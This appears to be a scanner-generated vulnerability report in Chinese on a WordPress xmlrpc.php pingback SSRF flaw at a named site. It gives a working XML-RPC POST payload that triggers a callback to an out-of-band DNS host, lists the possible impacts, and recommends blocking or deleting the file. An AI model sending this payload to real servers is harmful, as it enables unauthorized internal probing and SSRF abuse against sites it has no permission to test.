漏洞證明
xmlrpc.php 存在SSRF漏洞 漏洞地址:http://baijie.joowp.com/xmlrpc.php 驗證方法:
POST http://baijie.joowp.com/xmlrpc.php
<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://qxotxt.s0x.cn/</string></value></param>
<param><value><string>http://baijie.joowp.com//?p=1</string></value></param>
</params>
</methodCall>
匹配內容:
查詢到DNS請求: qxotxt.s0x.cn,說明漏洞存在
造成的影響
1、可以對業務內網進行探測。 2、攻擊運行在內網或本地的應用程序(比如溢出攻擊)。 3、利用file協議讀取本地文件等。
安全建議
通過.htaccess屏蔽xmlrpc.php文件的訪問 # protect xmlrpc Order Deny,Allow Deny from all 刪除根目錄下的xmlrpc.php。
技術參考
https://help.aliyun.com/knowledge_detail/42198.html





